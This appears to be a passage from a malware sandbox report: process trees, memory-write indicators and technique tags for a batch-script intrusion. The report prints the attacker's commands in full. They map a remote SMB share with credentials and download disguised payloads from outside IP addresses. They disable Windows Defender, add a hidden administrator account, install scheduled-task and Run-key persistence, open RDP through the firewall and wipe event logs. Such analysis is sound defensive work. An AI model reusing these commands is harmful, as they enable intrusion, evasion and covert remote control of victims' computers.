Token: SeBackupPrivilege	2480	powershell.exe
Token: SeRestorePrivilege	2480	powershell.exe
Token: SeShutdownPrivilege	2480	powershell.exe
Token: SeDebugPrivilege	2480	powershell.exe
Token: SeSystemEnvironmentPrivilege	2480	powershell.exe
Token: SeRemoteShutdownPrivilege	2480	powershell.exe
Token: SeUndockPrivilege	2480	powershell.exe
Token: SeManageVolumePrivilege	2480	powershell.exe
Token: 33	2480	powershell.exe
Token: 34	2480	powershell.exe
Token: 35	2480	powershell.exe
Token: 36	2480	powershell.exe
Token: SeDebugPrivilege	1840	powershell.exe
Token: SeIncreaseQuotaPrivilege	1840	powershell.exe
Token: SeSecurityPrivilege	1840	powershell.exe
Token: SeTakeOwnershipPrivilege	1840	powershell.exe
Token: SeLoadDriverPrivilege	1840	powershell.exe
Token: SeSystemProfilePrivilege	1840	powershell.exe
Token: SeSystemtimePrivilege	1840	powershell.exe
Token: SeProfSingleProcessPrivilege	1840	powershell.exe
Token: SeIncBasePriorityPrivilege	1840	powershell.exe
Token: SeCreatePagefilePrivilege	1840	powershell.exe
Token: SeBackupPrivilege	1840	powershell.exe
Token: SeRestorePrivilege	1840	powershell.exe
Token: SeShutdownPrivilege	1840	powershell.exe
Token: SeDebugPrivilege	1840	powershell.exe
Token: SeSystemEnvironmentPrivilege	1840	powershell.exe
Token: SeRemoteShutdownPrivilege	1840	powershell.exe
Token: SeUndockPrivilege	1840	powershell.exe
Token: SeManageVolumePrivilege	1840	powershell.exe
Token: 33	1840	powershell.exe
Token: 34	1840	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 644 wrote to memory of 3416	644	cmd.exe	74
PID 644 wrote to memory of 3416	644	cmd.exe	74
PID 644 wrote to memory of 4496	644	cmd.exe	76
PID 644 wrote to memory of 4496	644	cmd.exe	76
PID 4496 wrote to memory of 2776	4496	cmd.exe	77
PID 4496 wrote to memory of 2776	4496	cmd.exe	77
PID 644 wrote to memory of 4400	644	cmd.exe	78
PID 644 wrote to memory of 4400	644	cmd.exe	78
PID 644 wrote to memory of 4400	644	cmd.exe	78
PID 644 wrote to memory of 2480	644	cmd.exe	81
PID 644 wrote to memory of 2480	644	cmd.exe	81
PID 644 wrote to memory of 1840	644	cmd.exe	82
PID 644 wrote to memory of 1840	644	cmd.exe	82
PID 644 wrote to memory of 3124	644	cmd.exe	83
PID 644 wrote to memory of 3124	644	cmd.exe	83
PID 644 wrote to memory of 1212	644	cmd.exe	84
PID 644 wrote to memory of 1212	644	cmd.exe	84
PID 4940 wrote to memory of 508	4940	MeshAgent.exe	85
PID 4940 wrote to memory of 508	4940	MeshAgent.exe	85
PID 4940 wrote to memory of 508	4940	MeshAgent.exe	85
PID 4940 wrote to memory of 2276	4940	MeshAgent.exe	87
PID 4940 wrote to memory of 2276	4940	MeshAgent.exe	87
PID 4940 wrote to memory of 2276	4940	MeshAgent.exe	87
PID 644 wrote to memory of 1636	644	cmd.exe	89
PID 644 wrote to memory of 1636	644	cmd.exe	89
PID 1636 wrote to memory of 1648	1636	net.exe	90
PID 1636 wrote to memory of 1648	1636	net.exe	90
PID 4940 wrote to memory of 700	4940	MeshAgent.exe	91
PID 4940 wrote to memory of 700	4940	MeshAgent.exe	91
PID 4940 wrote to memory of 700	4940	MeshAgent.exe	91
PID 644 wrote to memory of 652	644	cmd.exe	93
PID 644 wrote to memory of 652	644	cmd.exe	93
PID 652 wrote to memory of 4352	652	net.exe	94
PID 652 wrote to memory of 4352	652	net.exe	94
PID 644 wrote to memory of 4188	644	cmd.exe	95
PID 644 wrote to memory of 4188	644	cmd.exe	95
PID 4188 wrote to memory of 4392	4188	net.exe	96
PID 4188 wrote to memory of 4392	4188	net.exe	96
PID 644 wrote to memory of 748	644	cmd.exe	97
PID 644 wrote to memory of 748	644	cmd.exe	97
PID 644 wrote to memory of 2452	644	cmd.exe	98
PID 644 wrote to memory of 2452	644	cmd.exe	98
PID 2452 wrote to memory of 4956	2452	net.exe	99
PID 2452 wrote to memory of 4956	2452	net.exe	99
PID 644 wrote to memory of 1860	644	cmd.exe	100
PID 644 wrote to memory of 1860	644	cmd.exe	100
PID 1860 wrote to memory of 2484	1860	net.exe	101
PID 1860 wrote to memory of 2484	1860	net.exe	101
PID 644 wrote to memory of 4372	644	cmd.exe	102
PID 644 wrote to memory of 4372	644	cmd.exe	102
PID 644 wrote to memory of 4996	644	cmd.exe	103
PID 644 wrote to memory of 4996	644	cmd.exe	103
PID 644 wrote to memory of 2892	644	cmd.exe	104
PID 644 wrote to memory of 2892	644	cmd.exe	104
PID 644 wrote to memory of 3860	644	cmd.exe	105
PID 644 wrote to memory of 3860	644	cmd.exe	105
PID 644 wrote to memory of 5028	644	cmd.exe	106
PID 644 wrote to memory of 5028	644	cmd.exe	106
PID 644 wrote to memory of 5052	644	cmd.exe	107
PID 644 wrote to memory of 5052	644	cmd.exe	107
PID 644 wrote to memory of 2524	644	cmd.exe	108
PID 644 wrote to memory of 2524	644	cmd.exe	108
PID 644 wrote to memory of 1084	644	cmd.exe	109
PID 644 wrote to memory of 1084	644	cmd.exe	109

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
516	attrib.exe
1508	attrib.exe
1808	attrib.exe
1972	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\xdr.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:644
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell -windowstyle hidden Add-MpPreference -ExclusionPath 'C:'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3416
- C:\Windows\system32\cmd.exe
  cmd /C net use \\45.139.196.250\shear /user:WORKGROUP\smb "123123@@"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4496
- - C:\Windows\system32\net.exe
    net use \\45.139.196.250\shear /user:WORKGROUP\smb "123123@@"
    3⤵
    PID:2776
- \??\UNC\45.139.196.250\shear\s.exe
  \\45.139.196.250\shear\s.exe -fullinstall
  2⤵
  - Sets service image path in registry
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  PID:4400
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell Add-MpPreference -ExclusionPath 'c:\'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2480
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1840
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:3124
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell Add-MpPreference -ExclusionPath 'C:\programdata\Windata'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:1212
- C:\Windows\system32\net.exe
  net user t1 Raed12346@@ /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1636
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user t1 Raed12346@@ /add
    3⤵
    PID:1648
- C:\Windows\system32\net.exe
  net localgroup administrators t1 /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:652
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 localgroup administrators t1 /add
    3⤵
    PID:4352
- C:\Windows\system32\net.exe
  net localgroup Administratörer t1 /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4188
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 localgroup Administratörer t1 /add
    3⤵
    PID:4392
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v t1 /t REG_DWORD /d 0 /f
  2⤵
  - Hide Artifacts: Hidden Users
  PID:748
- C:\Windows\system32\net.exe
  net user t1 /active:no
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2452
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user t1 /active:no
    3⤵
    PID:4956
- C:\Windows\system32\net.exe
  net user t1 /active:yes
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1860
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user t1 /active:yes
    3⤵
    PID:2484
- C:\Windows\system32\ReAgentc.exe
  reagentc.exe /disable
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  PID:4372
- C:\Windows\system32\reg.exe
  reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /f
  2⤵
  PID:4996
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications" /v ToastEnabled /t REG_DWORD /d 0 /f
  2⤵
  PID:2892
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications" /v LockScreenToastEnabled /t REG_DWORD /d 0 /f
  2⤵
  PID:3860
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\MSEdge" /v Enabled /t REG_DWORD /d 0 /f
  2⤵
  PID:5028
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter" /v Enabled /t REG_DWORD /d 0 /f
  2⤵
  PID:5052
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v DisableNotificationCenter /t REG_DWORD /d 1 /f
  2⤵
  PID:2524
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:1084
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "1" /f
  2⤵
  PID:2904
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
  2⤵
  PID:2916
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v TamperProtection /t REG_DWORD /d "1" /f
  2⤵
  PID:1692
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  2⤵
  PID:2740
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/ngrok.yml','C:\Users\Admin\AppData\Local\ngrok\ngrok.yml')
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:1136
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/ngrok.zip','C:\ProgramData\Windata\ngrok.zip')
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:4724
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://152.89.239.119/x222.jpg','C:\ProgramData\Windata\winlogin.exe')
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2452
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/WindowsUpdate.jpg','C:\ProgramData\Windata\WindowsUpdate.exe')
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:4720
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell Expand-Archive "ngrok.zip" -DestinationPath "."
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4552
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/auto-install-hrdp.bat','C:\ProgramData\Windata\installer.bat')
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:592
- C:\Windows\system32\attrib.exe
  attrib +s +h C:\programdata\Windata
  2⤵
  - Sets file to hidden
  - Views/modifies file attributes
  PID:516
- C:\Windows\system32\attrib.exe
  attrib +s +h C:\programdata\Windata\*.*
  2⤵
  - Sets file to hidden
  - Views/modifies file attributes
  PID:1508
- C:\Windows\system32\attrib.exe
  attrib -s +h C:\programdata\Windata\*.bat
  2⤵
  - Sets file to hidden
  - Views/modifies file attributes
  PID:1808
- C:\Windows\system32\schtasks.exe
  schtasks /create /tn WindowsPowerup /ru "Admin" /sc ONSTART /DELAY 0000:30 /RL HIGHEST /tr "C:\ProgramData\Windata\srlhost.exe" /f /it
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:4392
- C:\Windows\system32\schtasks.exe
  schtasks /create /tn Winlogo /ru "Admin" /sc minute /mo 5 /RL HIGHEST /tr "C:\ProgramData\Windata\winlogin.exe" /f /it
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:4204
- C:\Windows\system32\schtasks.exe
  schtasks /create /tn WindowsUp /ru "Admin" /sc ONSTART /DELAY 0000:30 /RL HIGHEST /tr "C:\ProgramData\Windata\WindowsUpdate.exe" /f /it
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:4132
- C:\Windows\system32\reg.exe
  REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "WindowsPowerup" /t REG_SZ /F /D "C:\ProgramData\Windata\srlhost.exe"
  2⤵
  - Adds Run key to start application
  PID:4216
- C:\Windows\system32\reg.exe
  REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "WindowsUpdatez" /t REG_SZ /F /D "C:\ProgramData\Windata\WindowsUpdate.exe"
  2⤵
  - Adds Run key to start application
  PID:3612
- C:\Windows\system32\attrib.exe
  attrib -s +h C:\programdata\Windata\*.bat
  2⤵
  - Sets file to hidden
  - Views/modifies file attributes
  PID:1972
- C:\Windows\system32\cmd.exe
  cmd /C C:\ProgramData\Windata\installer.bat
  2⤵
  - Drops file in Program Files directory
  PID:3088
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/hrdp/hrdp.zip','C:\ProgramData\Windata\hrdp.zip')
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4976
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell Expand-Archive "C:\ProgramData\Windata\hrdp.zip" -DestinationPath "C:\ProgramData\Windata\hrdp"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4372
- - C:\Windows\system32\cmd.exe
    cmd /C C:\ProgramData\Windata\hrdp\install.bat
    3⤵
    PID:3084
  - - C:\ProgramData\Windata\hrdp\RDPWInst.exe
      "C:\ProgramData\Windata\hrdp\RDPWInst" -i -o
      4⤵
      Server Software Component: Terminal Services DLL
      Executes dropped EXE
      Modifies WinLogon
      Drops file in Program Files directory
      System Location Discovery: System Language Discovery
      PID:848
    - - C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4608
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/hrdp/update.zip','C:\Program Files\RDP Wrapper\update.zip')
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    PID:32
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/hrdp/autoupdate.zip','C:\Program Files\RDP Wrapper\autoupdate.zip')
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    PID:3608
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell Expand-Archive "update.zip" -DestinationPath "."
    3⤵
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    PID:8
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell Expand-Archive "autoupdate.zip" -DestinationPath "."
    3⤵
    - Drops file in Program Files directory
    PID:1304
- - C:\Windows\system32\cmd.exe
    cmd /C "C:\Program Files\RDP Wrapper\rdpwrap_ini_updater.bat"
    3⤵
    - Drops file in Program Files directory
    PID:1764
  - - C:\Windows\system32\fsutil.exe
      fsutil dirty query C:
      4⤵
      PID:4732
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.17134.706]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:1120
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.17763.165]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:4592
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.17763.292]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:2468
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.17763.379]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:1548
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.17763.437]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:4240
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.18362.1]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:2276
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.18362.53]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:1648
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.18362.267]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:4556
  - - C:\Program Files\RDP Wrapper\RDPWInst.exe
      "C:\Program Files\RDP Wrapper\RDPWInst.exe" -r
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:2776
- - C:\Windows\system32\cmd.exe
    cmd /C "C:\Program Files\RDP Wrapper\re-install.bat"
    3⤵
    - Drops file in Program Files directory
    PID:4544
  - - C:\Windows\system32\fsutil.exe
      fsutil dirty query C:
      4⤵
      PID:3604
  - - C:\Program Files\RDP Wrapper\RDPWInst.exe
      "C:\Program Files\RDP Wrapper\RDPWInst" -u
      4⤵
      Server Software Component: Terminal Services DLL
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:516
    - - C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall delete rule name="Remote Desktop"
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:1972
  - - C:\Program Files\RDP Wrapper\RDPWInst.exe
      "C:\Program Files\RDP Wrapper\RDPWInst" -i -o
      4⤵
      Server Software Component: Terminal Services DLL
      Executes dropped EXE
      Modifies WinLogon
      Drops file in Program Files directory
      System Location Discovery: System Language Discovery
      PID:5116
    - - C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:3828
  - - C:\Windows\system32\fsutil.exe
      fsutil dirty query C:
      4⤵
      PID:1880
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.17134.706]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:1420
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.17763.165]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:4540
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.17763.292]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:1168
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.17763.379]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:1988
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.17763.437]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:2760
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.18362.1]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:1860
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.18362.53]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:1960
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.18362.267]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:4724
  - - C:\Program Files\RDP Wrapper\RDPWInst.exe
      "C:\Program Files\RDP Wrapper\RDPWInst.exe" -r
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:3364
- - C:\Windows\system32\cmd.exe
    cmd /C "C:\Program Files\RDP Wrapper\helper\autoupdate__enable_autorun_on_startup.bat"
    3⤵
    PID:1208
  - - C:\Windows\system32\fsutil.exe
      fsutil dirty query C:
      4⤵
      PID:920
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc ONSTART /tn "RDP Wrapper Autoupdate" /tr "cmd.exe /C \"C:\Program Files\RDP Wrapper\autoupdate.bat\" -log" /ru SYSTEM /delay 0000:10
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2448
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell "$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries; Set-ScheduledTask -TaskName 'RDP Wrapper Autoupdate' -Settings $settings"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3864
- - C:\Windows\system32\cmd.exe
    cmd /C "C:\Program Files\RDP Wrapper\autoupdate.bat"
    3⤵
    PID:4588
  - - C:\Windows\system32\fsutil.exe
      fsutil dirty query C:
      4⤵
      PID:4916
  - - C:\Windows\system32\sc.exe
      sc queryex "TermService"
      4⤵
      Launches sc.exe
      PID:4248
  - - C:\Windows\system32\find.exe
      find "STATE"
      4⤵
      PID:2268
  - - C:\Windows\system32\find.exe
      find /v "RUNNING"
      4⤵
      PID:4592
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c query session rdp-tcp
      4⤵
      PID:848
    - - C:\Windows\system32\query.exe
        
        query session rdp-tcp
        5⤵
        
        PID:1524
      - C:\Windows\system32\qwinsta.exe
        
        "C:\Windows\system32\qwinsta.exe" rdp-tcp
        6⤵
        
        PID:3884
  - - C:\Windows\system32\reg.exe
      reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f /v ServiceDll /t REG_EXPAND_SZ /d "C:\Program Files\RDP Wrapper\rdpwrap.dll"
      4⤵
      Server Software Component: Terminal Services DLL
      PID:1264
  - - C:\Program Files\RDP Wrapper\RDPWInst.exe
      "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
      4⤵
      Server Software Component: Terminal Services DLL
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4960
    - - C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall delete rule name="Remote Desktop"
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:3596
  - - C:\Program Files\RDP Wrapper\RDPWInst.exe
      "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
      4⤵
      Server Software Component: Terminal Services DLL
      Executes dropped EXE
      Modifies WinLogon
      Drops file in Program Files directory
      System Location Discovery: System Language Discovery
      PID:4972
    - - C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4636
  - - C:\Windows\system32\reg.exe
      reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
      4⤵
      PID:948
  - - C:\Windows\system32\reg.exe
      reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
      4⤵
      PID:1244
  - - C:\Windows\system32\reg.exe
      reg query "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f "rdpwrap.dll"
      4⤵
      PID:1136
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
      4⤵
      PID:5080
    - - C:\Windows\system32\cscript.exe
        
        cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
        5⤵
        
        PID:3608
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" 2>nul
      4⤵
      PID:3136
    - - C:\Windows\system32\reg.exe
        
        reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll"
        5⤵
        
        PID:4204
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" /t REG_SZ /d "10.0.15063.0" /f
      4⤵
      PID:4260
  - - C:\Windows\system32\findstr.exe
      findstr /c:"[10.0.15063.0]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:4192
- C:\Windows\system32\cmd.exe
  cmd /C for /F "tokens=*" in ('wevtutil.exe el') DO wevtutil.exe cl ""
  2⤵
  PID:4956

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:4940
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:508
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2276
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:700
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2912
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4340
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1660
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:3612
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:2512
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
